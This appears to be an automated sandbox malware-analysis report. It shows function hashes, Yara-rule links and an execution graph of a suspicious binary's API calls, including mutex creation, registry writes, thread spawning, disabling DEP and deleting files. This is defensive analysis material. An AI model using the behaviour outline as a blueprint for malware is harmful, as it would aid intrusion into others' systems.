                                                                                              • Snapshot File: hcaresult_8_2_19d000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e0976a01c9d42be819b5261bd8a5a6bc92e0473809b069275f34da0bdf22d81b
                                                                                              • Instruction ID: 0c082b2c945fd335733d1d58268c85a60e7294852b7935252afa4a06a8b70c7f
                                                                                              • Opcode Fuzzy Hash: e0976a01c9d42be819b5261bd8a5a6bc92e0473809b069275f34da0bdf22d81b
                                                                                              • Instruction Fuzzy Hash: 1B01A771504340DBEB108E25DCC4767BF98DF51764F2CC515FC490B186C3799845CAB1
                                                                                              Function 0019D01C Relevance: .0, Instructions: 36COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.373593318.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_19d000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c1fa5d2c3433583275416dc4de56176a25e7a03bf6168e65d9eca78c84233148
                                                                                              • Instruction ID: 0f452136a00bd43231c078ce0af81f9b2458d2b4f4ecddf81feaf1d8db7d170c
                                                                                              • Opcode Fuzzy Hash: c1fa5d2c3433583275416dc4de56176a25e7a03bf6168e65d9eca78c84233148
                                                                                              • Instruction Fuzzy Hash: B3F06271504344AFEB108E16DCC4B62FF98EB91764F18C55AED885A286C3799C44CAB1
                                                                                              Function 007F1B7F Relevance: .0, Instructions: 23COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.373823920.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7f0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2abc3c08fee1cb1dd47e5e049f8da03c305a6f74d4ed957c620548434eff47d0
                                                                                              • Instruction ID: dedc91ffdfebc768869b4a401c01f51afc9bc97de1f017bb6bc83d19a3f21fa3
                                                                                              • Opcode Fuzzy Hash: 2abc3c08fee1cb1dd47e5e049f8da03c305a6f74d4ed957c620548434eff47d0
                                                                                              • Instruction Fuzzy Hash: CDE0D871B04348CBDF59A66590213BD7B616FA2251F9081E6C95097346DA388805C362

                                                                                              Non-executed Functions

                                                                                              Function 00223F7A Relevance: .1, Instructions: 97COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.373720885.0000000000220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_220000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d606f7ae3540133074522bab2029bab79378c4838f18ef0a056344208d81f7f0
                                                                                              • Instruction ID: 225a799c4e51ab96712335f5bd3a011f777835df7ccf7a6cb12152c8a29dc227
                                                                                              • Opcode Fuzzy Hash: d606f7ae3540133074522bab2029bab79378c4838f18ef0a056344208d81f7f0
                                                                                              • Instruction Fuzzy Hash: F5314BA291D3D11FE7079A6998A93823F70EB37291F5B08FBC581CB0D3E51D851B9352
                                                                                              Function 007F00A0 Relevance: 15.4, Strings: 12, Instructions: 404COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.373823920.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7f0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (:&$(:&$(:&$L4#p$L4#p$L4#p$L4#p$L4#p$L4#p$L:&$L:&$L:&
                                                                                              • API String ID: 0-3774716360
                                                                                              • Opcode ID: 040577ea8104ce34d9fb55fa25935299a03ef3fb112d011bdf6647c748909486
                                                                                              • Instruction ID: 077a4c45e02b3803bfff7ac97d76ad9cca141d2fccb70f227d89100fae2c714a
                                                                                              • Opcode Fuzzy Hash: 040577ea8104ce34d9fb55fa25935299a03ef3fb112d011bdf6647c748909486
                                                                                              • Instruction Fuzzy Hash: ECD10831704258EFDB259B68C81477E7BA2AF81310F14847AEA059B393DB78DD45CBE1

                                                                                              Execution Graph

                                                                                              Execution Coverage:3.7%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:4.4%
                                                                                              Total number of Nodes:1320
                                                                                              Total number of Limit Nodes:46
                                                                                              execution_graph 47267 434906 47272 434bd8 SetUnhandledExceptionFilter 47267->47272 47269 43490b pre_c_initialization 47273 4455cc 20 API calls 2 library calls 47269->47273 47271 434916 47272->47269 47273->47271 47274 44839e 47282 448790 47274->47282 47277 4483b2 47279 4483ba 47280 4483c7 47279->47280 47290 4483ca 11 API calls 47279->47290 47291 44854a 47282->47291 47285 4487cf TlsAlloc 47286 4487c0 47285->47286 47298 43502b 47286->47298 47288 4483a8 47288->47277 47289 448319 20 API calls 2 library calls 47288->47289 47289->47279 47290->47277 47292 448576 47291->47292 47293 44857a 47291->47293 47292->47293 47297 44859a 47292->47297 47305 4485e6 47292->47305 47293->47285 47293->47286 47295 4485a6 GetProcAddress 47296 4485b6 __crt_fast_encode_pointer 47295->47296 47296->47293 47297->47293 47297->47295 47299 435036 IsProcessorFeaturePresent 47298->47299 47300 435034 47298->47300 47302 435078 47299->47302 47300->47288 47312 43503c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47302->47312 47304 43515b 47304->47288 47306 448607 LoadLibraryExW 47305->47306 47307 4485fc 47305->47307 47308 448624 GetLastError 47306->47308 47309 44863c 47306->47309 47307->47292 47308->47309 47310 44862f LoadLibraryExW 47308->47310 47309->47307 47311 448653 FreeLibrary 47309->47311 47310->47309 47311->47307 47312->47304 47313 43bea8 47316 43beb4 _swprintf ___BuildCatchObject 47313->47316 47314 43bec2 47329 44062d 20 API calls _free 47314->47329 47316->47314 47317 43beec 47316->47317 47324 445909 EnterCriticalSection 47317->47324 47319 43bec7 ___BuildCatchObject __wsopen_s 47320 43bef7 47325 43bf98 47320->47325 47324->47320 47327 43bfa6 47325->47327 47326 43bf02 47330 43bf1f LeaveCriticalSection std::_Lockit::~_Lockit 47326->47330 47327->47326 47331 4497ec 37 API calls 2 library calls 47327->47331 47329->47319 47330->47319 47331->47327 47332 434918 47333 434924 ___BuildCatchObject 47332->47333 47359 434627 47333->47359 47335 43492b 47337 434954 47335->47337 47665 434a8a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 47335->47665 47345 434993 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 47337->47345 47370 4442d2 47337->47370 47340 434973 ___BuildCatchObject 47342 4349f3 47378 434ba5 47342->47378 47345->47342 47666 443487 36 API calls 5 library calls 47345->47666 47352 434a15 47353 434a1f 47352->47353 47668 4434bf 28 API calls _abort 47352->47668 47355 434a28 47353->47355 47669 443462 28 API calls _abort 47353->47669 47670 43479e 13 API calls 2 library calls 47355->47670 47358 434a30 47358->47340 47360 434630 47359->47360 47671 434cb6 IsProcessorFeaturePresent 47360->47671 47362 43463c 47672 438fb1 47362->47672 47364 434641 47369 434645 47364->47369 47681 44415f 47364->47681 47367 43465c 47367->47335 47369->47335 47371 4442e9 47370->47371 47372 43502b __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 47371->47372 47373 43496d 47372->47373 47373->47340 47374 444276 47373->47374 47375 4442a5 47374->47375 47376 43502b __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 47375->47376 47377 4442ce 47376->47377 47377->47345 47731 436f10 47378->47731 47381 4349f9 47382 444223 47381->47382 47733 44f0d9 47382->47733 47384 44422c 47385 434a02 47384->47385 47737 446895 36 API calls 47384->47737 47387 40ea00 47385->47387 47908 41cbe1 LoadLibraryA GetProcAddress 47387->47908 47389 40ea1c GetModuleFileNameW 47913 40f3fe 47389->47913 47391 40ea38 47928 4020f6 47391->47928 47394 4020f6 28 API calls 47395 40ea56 47394->47395 47934 41beac 47395->47934 47399 40ea68 47960 401e8d 47399->47960 47401 40ea71 47402 40ea84 47401->47402 47403 40eace 47401->47403 48228 40fbee 118 API calls 47402->48228 47966 401e65 47403->47966 47406 40eade 47410 401e65 22 API calls 47406->47410 47407 40ea96 47408 401e65 22 API calls 47407->47408 47409 40eaa2 47408->47409 48229 410f72 36 API calls __EH_prolog 47409->48229 47411 40eafd 47410->47411 47971 40531e 47411->47971 47414 40eb0c 47976 406383 47414->47976 47415 40eab4 48230 40fb9f 78 API calls 47415->48230 47419 40eabd 48231 40f3eb 71 API calls 47419->48231 47424 401fd8 11 API calls 47426 40ef36 47424->47426 47667 443396 GetModuleHandleW 47426->47667 47427 401fd8 11 API calls 47428 40eb36 47427->47428 47429 401e65 22 API calls 47428->47429 47430 40eb3f 47429->47430 47993 401fc0 47430->47993 47432 40eb4a 47433 401e65 22 API calls 47432->47433 47434 40eb63 47433->47434 47435 401e65 22 API calls 47434->47435 47436 40eb7e 47435->47436 47437 40ebe9 47436->47437 48232 406c59 47436->48232 47439 401e65 22 API calls 47437->47439 47444 40ebf6 47439->47444 47440 40ebab 47441 401fe2 28 API calls 47440->47441 47442 40ebb7 47441->47442 47443 401fd8 11 API calls 47442->47443 47446 40ebc0 47443->47446 47445 40ec3d 47444->47445 47449 413584 3 API calls 47444->47449 47997 40d0a4 47445->47997 48237 413584 RegOpenKeyExA 47446->48237 47448 40ec43 47450 40eac6 47448->47450 48000 41b354 47448->48000 47456 40ec21 47449->47456 47450->47424 47454 40ec5e 47457 40ecb1 47454->47457 48017 407751 47454->48017 47455 40f38a 48318 4139e4 30 API calls 47455->48318 47456->47445 48240 4139e4 30 API calls 47456->48240 47459 401e65 22 API calls 47457->47459 47462 40ecba 47459->47462 47472 40ecc6 47462->47472 47473 40eccb 47462->47473 47464 40f3a0 48319 4124b0 65 API calls ___scrt_fastfail 47464->48319 47465 40ec87 47470 401e65 22 API calls 47465->47470 47466 40ec7d 48241 407773 30 API calls 47466->48241 47468 40f3aa 47471 41bcef 28 API calls 47468->47471 47481 40ec90 47470->47481 47475 40f3ba 47471->47475 48244 407790 CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 47472->48244 47478 401e65 22 API calls 47473->47478 47474 40ec82 48242 40729b 98 API calls 47474->48242 48127 413a5e RegOpenKeyExW 47475->48127 47479 40ecd4 47478->47479 48021 41bcef 47479->48021 47481->47457 47485 40ecac 47481->47485 47482 40ecdf 48025 401f13 47482->48025 48243 40729b 98 API calls 47485->48243 47489 401f09 11 API calls 47491 40f3d7 47489->47491 47493 401f09 11 API calls 47491->47493 47495 40f3e0 47493->47495 47494 401e65 22 API calls 47496 40ecfc 47494->47496 48130 40dd7d 47495->48130 47500 401e65 22 API calls 47496->47500 47502 40ed16 47500->47502 47501 40f3ea 47503 401e65 22 API calls 47502->47503 47504 40ed30 47503->47504 47505 401e65 22 API calls 47504->47505 47506 40ed49 47505->47506 47507 40edb6 47506->47507 47508 401e65 22 API calls 47506->47508 47509 40edc5 47507->47509 47515 40ef41 ___scrt_fastfail 47507->47515 47513 40ed5e _wcslen 47508->47513 47510 40edce 47509->47510 47538 40ee4a ___scrt_fastfail 47509->47538 47511 401e65 22 API calls 47510->47511 47512 40edd7 47511->47512 47514 401e65 22 API calls 47512->47514 47513->47507 47517 401e65 22 API calls 47513->47517 47516 40ede9 47514->47516 48305 413733 RegOpenKeyExA RegQueryValueExA RegCloseKey 47515->48305 47520 401e65 22 API calls 47516->47520 47518 40ed79 47517->47518 47521 401e65 22 API calls 47518->47521 47522 40edfb 47520->47522 47523 40ed8e 47521->47523 47526 401e65 22 API calls 47522->47526 48245 40da6f 47523->48245 47524 40ef8c 47525 401e65 22 API calls 47524->47525 47527 40efb1 47525->47527 47529 40ee24 47526->47529 48047 402093 47527->48047 47532 401e65 22 API calls 47529->47532 47531 401f13 28 API calls 47534 40edad 47531->47534 47535 40ee35 47532->47535 47537 401f09 11 API calls 47534->47537 48303 40ce34 45 API calls _wcslen 47535->48303 47536 40efc3 48053 4137aa RegCreateKeyA 47536->48053 47537->47507 48037 413982 47538->48037 47542 40ee45 47542->47538 47544 40eede ctype 47547 401e65 22 API calls 47544->47547 47545 401e65 22 API calls 47546 40efe5 47545->47546 48059 43bb2c 47546->48059 47548 40eef5 47547->47548 47548->47524 47552 40ef09 47548->47552 47551 40effc 48306 41ce2c 87 API calls ___scrt_fastfail 47551->48306 47554 401e65 22 API calls 47552->47554 47553 40f01f 47558 402093 28 API calls 47553->47558 47556 40ef12 47554->47556 47559 41bcef 28 API calls 47556->47559 47557 40f003 CreateThread 47557->47553 48957 41d4ee 10 API calls 47557->48957 47560 40f034 47558->47560 47561 40ef1e 47559->47561 47562 402093 28 API calls 47560->47562 48304 40f4af 104 API calls 47561->48304 47564 40f043 47562->47564 48063 41b580 47564->48063 47565 40ef23 47565->47524 47567 40ef2a 47565->47567 47567->47450 47569 401e65 22 API calls 47570 40f054 47569->47570 47571 401e65 22 API calls 47570->47571 47572 40f066 47571->47572 47573 401e65 22 API calls 47572->47573 47574 40f086 47573->47574 47575 43bb2c _strftime 40 API calls 47574->47575 47576 40f093 47575->47576 47577 401e65 22 API calls 47576->47577 47578 40f09e 47577->47578 47579 401e65 22 API calls 47578->47579 47580 40f0af 47579->47580 47581 401e65 22 API calls 47580->47581 47582 40f0c4 47581->47582 47583 401e65 22 API calls 47582->47583 47584 40f0d5 47583->47584 47585 40f0dc StrToIntA 47584->47585 48087 409e1f 47585->48087 47588 401e65 22 API calls 47589 40f0f7 47588->47589 47590 40f103 47589->47590 47591 40f13c 47589->47591 48307 43455e 47590->48307 47594 401e65 22 API calls 47591->47594 47596 40f14c 47594->47596 47595 401e65 22 API calls 47597 40f11f 47595->47597 47599 40f194 47596->47599 47600 40f158 47596->47600 47598 40f126 CreateThread 47597->47598 47598->47591 48961 41a045 103 API calls 2 library calls 47598->48961 47602 401e65 22 API calls 47599->47602 47601 43455e new 22 API calls 47600->47601 47603 40f161 47601->47603 47604 40f19d 47602->47604 47605 401e65 22 API calls 47603->47605 47607 40f207 47604->47607 47608 40f1a9 47604->47608 47606 40f173 47605->47606 47609 40f17a CreateThread 47606->47609 47610 401e65 22 API calls 47607->47610 47611 401e65 22 API calls 47608->47611 47609->47599 48960 41a045 103 API calls 2 library calls 47609->48960 47612 40f210 47610->47612 47613 40f1b9 47611->47613 47615 40f255 47612->47615 47616 40f21c 47612->47616 47614 401e65 22 API calls 47613->47614 47618 40f1ce 47614->47618 48112 41b69e 47615->48112 47617 401e65 22 API calls 47616->47617 47620 40f225 47617->47620 48314 40da23 31 API calls 47618->48314 47626 401e65 22 API calls 47620->47626 47622 401f13 28 API calls 47624 40f269 47622->47624 47625 401f09 11 API calls 47624->47625 47628 40f272 47625->47628 47629 40f23a 47626->47629 47627 40f1e1 47630 401f13 28 API calls 47627->47630 47631 40f27b SetProcessDEPPolicy 47628->47631 47632 40f27e CreateThread 47628->47632 47639 43bb2c _strftime 40 API calls 47629->47639 47633 40f1ed 47630->47633 47631->47632 47634 40f293 CreateThread 47632->47634 47635 40f29f 47632->47635 48929 40f7e2 47632->48929 47636 401f09 11 API calls 47633->47636 47634->47635 48956 412132 138 API calls 47634->48956 47637 40f2b4 47635->47637 47638 40f2a8 CreateThread 47635->47638 47640 40f1f6 CreateThread 47636->47640 47642 40f307 47637->47642 47644 402093 28 API calls 47637->47644 47638->47637 48958 412716 38 API calls ___scrt_fastfail 47638->48958 47641 40f247 47639->47641 47640->47607 48959 401be9 50 API calls _strftime 47640->48959 48315 40c19d 7 API calls 47641->48315 48124 41353a RegOpenKeyExA 47642->48124 47645 40f2d7 47644->47645 48316 4052fd 28 API calls 47645->48316 47651 40f328 47653 41bcef 28 API calls 47651->47653 47655 40f338 47653->47655 48317 413656 31 API calls 47655->48317 47659 40f34e 47660 401f09 11 API calls 47659->47660 47663 40f359 47660->47663 47661 40f381 DeleteFileW 47662 40f388 47661->47662 47661->47663 47662->47468 47663->47468 47663->47661 47664 40f36f Sleep 47663->47664 47664->47663 47665->47335 47666->47342 47667->47352 47668->47353 47669->47355 47670->47358 47671->47362 47673 438fb6 ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 47672->47673 47685 43a4ba 47673->47685 47676 438fc4 47676->47364 47678 438fcc 47679 438fd7 47678->47679 47699 43a4f6 DeleteCriticalSection 47678->47699 47679->47364 47727 44fbe8 47681->47727 47684 438fda 8 API calls 3 library calls 47684->47369 47687 43a4c3 47685->47687 47688 43a4ec 47687->47688 47689 438fc0 47687->47689 47700 438eff 47687->47700 47705 43a4f6 DeleteCriticalSection 47688->47705 47689->47676 47691 43a46c 47689->47691 47720 438e14 47691->47720 47693 43a481 47693->47678 47694 43a476 47694->47693 47725 438ec2 6 API calls try_get_function 47694->47725 47696 43a48f 47697 43a49c 47696->47697 47726 43a49f 6 API calls ___vcrt_FlsFree 47696->47726 47697->47678 47699->47676 47706 438cf3 47700->47706 47703 438f36 InitializeCriticalSectionAndSpinCount 47704 438f22 47703->47704 47704->47687 47705->47689 47710 438d27 47706->47710 47711 438d23 47706->47711 47707 438d47 47709 438d53 GetProcAddress 47707->47709 47707->47710 47712 438d63 __crt_fast_encode_pointer 47709->47712 47710->47703 47710->47704 47711->47707 47711->47710 47713 438d93 47711->47713 47712->47710 47714 438dbb LoadLibraryExW 47713->47714 47715 438db0 47713->47715 47716 438dd7 GetLastError 47714->47716 47717 438def 47714->47717 47715->47711 47716->47717 47718 438de2 LoadLibraryExW 47716->47718 47717->47715 47719 438e06 FreeLibrary 47717->47719 47718->47717 47719->47715 47721 438cf3 try_get_function 5 API calls 47720->47721 47722 438e2e 47721->47722 47723 438e46 TlsAlloc 47722->47723 47724 438e37 47722->47724 47724->47694 47725->47696 47726->47693 47730 44fc01 47727->47730 47728 43502b __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 47729 43464e 47728->47729 47729->47367 47729->47684 47730->47728 47732 434bb8 GetStartupInfoW 47731->47732 47732->47381 47734 44f0eb 47733->47734 47735 44f0e2 47733->47735 47734->47384 47738 44efd8 47735->47738 47737->47384 47758 448295 GetLastError 47738->47758 47740 44efe5 47779 44f0f7 47740->47779 47742 44efed 47788 44ed6c 47742->47788 47745 44f004 47745->47734 47748 44f047 47813 446802 20 API calls _free 47748->47813 47752 44f042 47812 44062d 20 API calls _free 47752->47812 47754 44f08b 47754->47748 47815 44ec42 20 API calls 47754->47815 47755 44f05f 47755->47754 47814 446802 20 API calls _free 47755->47814 47759 4482b7 47758->47759 47760 4482ab 47758->47760 47817 445b74 20 API calls 3 library calls 47759->47817 47816 44883c 11 API calls 2 library calls 47760->47816 47763 4482b1 47763->47759 47765 448300 SetLastError 47763->47765 47764 4482c3 47766 4482cb 47764->47766 47819 448892 11 API calls 2 library calls 47764->47819 47765->47740 47818 446802 20 API calls _free 47766->47818 47769 4482e0 47769->47766 47771 4482e7 47769->47771 47770 4482d1 47772 44830c SetLastError 47770->47772 47820 448107 20 API calls _free 47771->47820 47822 446175 36 API calls 4 library calls 47772->47822 47775 4482f2 47821 446802 20 API calls _free 47775->47821 47777 448318 47778 4482f9 47778->47765 47778->47772 47780 44f103 ___BuildCatchObject 47779->47780 47781 448295 IsInExceptionSpec 36 API calls 47780->47781 47782 44f10d 47781->47782 47785 44f191 ___BuildCatchObject 47782->47785 47823 446175 36 API calls 4 library calls 47782->47823 47824 445909 EnterCriticalSection 47782->47824 47825 446802 20 API calls _free 47782->47825 47826 44f188 LeaveCriticalSection std::_Lockit::~_Lockit 47782->47826 47785->47742 47827 43a837 47788->47827 47791 44ed8d GetOEMCP 47794 44edb6 47791->47794 47792 44ed9f 47793 44eda4 GetACP 47792->47793 47792->47794 47793->47794 47794->47745 47795 4461b8 47794->47795 47796 4461f6 47795->47796 47800 4461c6 ___crtLCMapStringA 47795->47800 47838 44062d 20 API calls _free 47796->47838 47798 4461e1 RtlAllocateHeap 47799 4461f4 47798->47799 47798->47800 47799->47748 47802 44f199 47799->47802 47800->47796 47800->47798 47837 443001 7 API calls 2 library calls 47800->47837 47803 44ed6c 38 API calls 47802->47803 47804 44f1b8 47803->47804 47807 44f209 IsValidCodePage 47804->47807 47809 44f1bf 47804->47809 47811 44f22e ___scrt_fastfail 47804->47811 47805 43502b __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 47806 44f03a 47805->47806 47806->47752 47806->47755 47808 44f21b GetCPInfo 47807->47808 47807->47809 47808->47809 47808->47811 47809->47805 47839 44ee44 GetCPInfo 47811->47839 47812->47748 47813->47745 47814->47754 47815->47748 47816->47763 47817->47764 47818->47770 47819->47769 47820->47775 47821->47778 47822->47777 47823->47782 47824->47782 47825->47782 47826->47782 47828 43a854 47827->47828 47829 43a84a 47827->47829 47828->47829 47830 448295 IsInExceptionSpec 36 API calls 47828->47830 47829->47791 47829->47792 47831 43a875 47830->47831 47835 4483e4 36 API calls __Toupper 47831->47835 47833 43a88e 47836 448411 36 API calls _strftime 47833->47836 47835->47833 47836->47829 47837->47800 47838->47799 47840 44ef28 47839->47840 47846 44ee7e 47839->47846 47843 43502b __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 47840->47843 47845 44efd4 47843->47845 47845->47809 47849 4511ac 47846->47849 47848 44aee6 _swprintf 41 API calls 47848->47840 47850 43a837 _strftime 36 API calls 47849->47850 47851 4511cc MultiByteToWideChar 47850->47851 47853 45120a 47851->47853 47860 4512a2 47851->47860 47855 4461b8 ___crtLCMapStringA 21 API calls 47853->47855 47859 45122b __alloca_probe_16 ___scrt_fastfail 47853->47859 47854 43502b __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 47856 44eedf 47854->47856 47855->47859 47863 44aee6 47856->47863 47857 45129c 47868 435ecd 20 API calls _free 47857->47868 47859->47857 47861 451270 MultiByteToWideChar 47859->47861 47860->47854 47861->47857 47862 45128c GetStringTypeW 47861->47862 47862->47857 47864 43a837 _strftime 36 API calls 47863->47864 47865 44aef9 47864->47865 47869 44acc9 47865->47869 47868->47860 47870 44ace4 ___crtLCMapStringA 47869->47870 47871 44ad0a MultiByteToWideChar 47870->47871 47872 44ad34 47871->47872 47883 44aebe 47871->47883 47875 4461b8 ___crtLCMapStringA 21 API calls 47872->47875 47881 44ad55 __alloca_probe_16 47872->47881 47873 43502b __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 47874 44aed1 47873->47874 47874->47848 47875->47881 47876 44ae0a 47905 435ecd 20 API calls _free 47876->47905 47877 44ad9e MultiByteToWideChar 47877->47876 47878 44adb7 47877->47878 47896 448c33 47878->47896 47881->47876 47881->47877 47883->47873 47884 44ade1 47884->47876 47887 448c33 _strftime 11 API calls 47884->47887 47885 44ae19 47886 4461b8 ___crtLCMapStringA 21 API calls 47885->47886 47889 44ae3a __alloca_probe_16 47885->47889 47886->47889 47887->47876 47888 44aeaf 47904 435ecd 20 API calls _free 47888->47904 47889->47888 47890 448c33 _strftime 11 API calls 47889->47890 47892 44ae8e 47890->47892 47892->47888 47893 44ae9d WideCharToMultiByte 47892->47893 47893->47888 47894 44aedd 47893->47894 47906 435ecd 20 API calls _free 47894->47906 47897 44854a _free 5 API calls 47896->47897 47898 448c5a 47897->47898 47901 448c63 47898->47901 47907 448cbb 10 API calls 3 library calls 47898->47907 47900 448ca3 LCMapStringW 47900->47901 47902 43502b __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 47901->47902 47903 448cb5 47902->47903 47903->47876 47903->47884 47903->47885 47904->47876 47905->47883 47906->47876 47907->47900 47909 41cc20 LoadLibraryA GetProcAddress 47908->47909 47910 41cc10 GetModuleHandleA GetProcAddress 47908->47910 47911 41cc49 44 API calls 47909->47911 47912 41cc39 LoadLibraryA GetProcAddress 47909->47912 47910->47909 47911->47389 47912->47911 48320 41b539 FindResourceA 47913->48320 47917 40f428 _Yarn 48330 4020b7 47917->48330 47920 401fe2 28 API calls 47921 40f44e 47920->47921 47922 401fd8 11 API calls 47921->47922 47923 40f457 47922->47923 47924 43bda0 ___std_exception_copy 21 API calls 47923->47924 47925 40f468 _Yarn 47924->47925 48336 406e13 47925->48336 47927 40f49b 47927->47391 47929 40210c 47928->47929 47930 4023ce 11 API calls 47929->47930 47931 402126 47930->47931 47932 402569 28 API calls 47931->47932 47933 402134 47932->47933 47933->47394 48373 4020df 47934->48373 47936 41bf2f 47937 401fd8 11 API calls 47936->47937 47938 41bf61 47937->47938 47940 401fd8 11 API calls 47938->47940 47939 41bf31 48389 4041a2 28 API calls 47939->48389 47943 41bf69 47940->47943 47945 401fd8 11 API calls 47943->47945 47944 41bf3d 47946 401fe2 28 API calls 47944->47946 47948 40ea5f 47945->47948 47949 41bf46 47946->47949 47947 401fe2 28 API calls 47955 41bebf 47947->47955 47956 40fb52 47948->47956 47950 401fd8 11 API calls 47949->47950 47952 41bf4e 47950->47952 47951 401fd8 11 API calls 47951->47955 47953 41cec5 28 API calls 47952->47953 47953->47936 47955->47936 47955->47939 47955->47947 47955->47951 48377 4041a2 28 API calls 47955->48377 48378 41cec5 47955->48378 47957 40fb5e 47956->47957 47959 40fb65 47956->47959 48415 402163 11 API calls 47957->48415 47959->47399 47961 402163 47960->47961 47965 40219f 47961->47965 48416 402730 11 API calls 47961->48416 47963 402184 48417 402712 11 API calls std::_Deallocate 47963->48417 47965->47401 47967 401e6d 47966->47967 47970 401e75 47967->47970 48418 402158 22 API calls 47967->48418 47970->47406 47972 4020df 11 API calls 47971->47972 47973 40532a 47972->47973 48419 4032a0 47973->48419 47975 405346 47975->47414 48424 4051ef 47976->48424 47978 406391 48428 402055 47978->48428 47981 401fe2 47982 401ff1 47981->47982 47989 402039 47981->47989 47983 4023ce 11 API calls 47982->47983 47984 401ffa 47983->47984 47985 40203c 47984->47985 47987 402015 47984->47987 47986 40267a 11 API calls 47985->47986 47986->47989 48462 403098 28 API calls 47987->48462 47990 401fd8 47989->47990 47991 4023ce 11 API calls 47990->47991 47992 401fe1 47991->47992 47992->47427 47994 401fd2 47993->47994 47995 401fc9 47993->47995 47994->47432 48463 4025e0 28 API calls 47995->48463 48464 401fab 47997->48464 47999 40d0ae CreateMutexA GetLastError 47999->47448 48465 41c048 48000->48465 48005 401fe2 28 API calls 48006 41b390 48005->48006 48007 401fd8 11 API calls 48006->48007 48008 41b398 48007->48008 48009 4135e1 31 API calls 48008->48009 48011 41b3ee 48008->48011 48010 41b3c1 48009->48010 48012 41b3cc StrToIntA 48010->48012 48011->47454 48013 41b3e3 48012->48013 48014 41b3da 48012->48014 48015 401fd8 11 API calls 48013->48015 48473 41cffa 22 API calls 48014->48473 48015->48011 48018 407765 48017->48018 48019 413584 3 API calls 48018->48019 48020 40776c 48019->48020 48020->47465 48020->47466 48022 41bd03 48021->48022 48474 40b93f 48022->48474 48024 41bd0b 48024->47482 48026 401f22 48025->48026 48027 401f6a 48025->48027 48028 402252 11 API calls 48026->48028 48034 401f09 48027->48034 48029 401f2b 48028->48029 48030 401f6d 48029->48030 48032 401f46 48029->48032 48507 402336 48030->48507 48506 40305c 28 API calls 48032->48506 48035 402252 11 API calls 48034->48035 48036 401f12 48035->48036 48036->47494 48038 4139a0 48037->48038 48039 406e13 28 API calls 48038->48039 48040 4139b5 48039->48040 48041 4020f6 28 API calls 48040->48041 48042 4139c5 48041->48042 48043 4137aa 14 API calls 48042->48043 48044 4139cf 48043->48044 48045 401fd8 11 API calls 48044->48045 48046 4139dc 48045->48046 48046->47544 48048 40209b 48047->48048 48049 4023ce 11 API calls 48048->48049 48050 4020a6 48049->48050 48511 4024ed 48050->48511 48054 4137fa 48053->48054 48056 4137c3 48053->48056 48055 401fd8 11 API calls 48054->48055 48057 40efd9 48055->48057 48058 4137d5 RegSetValueExA RegCloseKey 48056->48058 48057->47545 48058->48054 48060 43bb45 _strftime 48059->48060 48515 43ae83 48060->48515 48062 40eff2 48062->47551 48062->47553 48064 41b631 48063->48064 48065 41b596 GetLocalTime 48063->48065 48066 401fd8 11 API calls 48064->48066 48067 40531e 28 API calls 48065->48067 48068 41b639 48066->48068 48069 41b5d8 48067->48069 48070 401fd8 11 API calls 48068->48070 48071 406383 28 API calls 48069->48071 48072 40f048 48070->48072 48073 41b5e4 48071->48073 48072->47569 48542 402f10 48073->48542 48076 406383 28 API calls 48077 41b5fc 48076->48077 48547 40723b 77 API calls 48077->48547 48079 41b60a 48080 401fd8 11 API calls 48079->48080 48081 41b616 48080->48081 48082 401fd8 11 API calls 48081->48082 48083 41b61f 48082->48083 48084 401fd8 11 API calls 48083->48084 48085 41b628 48084->48085 48086 401fd8 11 API calls 48085->48086 48086->48064 48088 409e3d _wcslen 48087->48088 48089 409e48 48088->48089 48090 409e5f 48088->48090 48092 40da6f 31 API calls 48089->48092 48091 40da6f 31 API calls 48090->48091 48093 409e67 48091->48093 48094 409e50 48092->48094 48095 401f13 28 API calls 48093->48095 48096 401f13 28 API calls 48094->48096 48097 409e75 48095->48097 48111 409e5a 48096->48111 48098 401f09 11 API calls 48097->48098 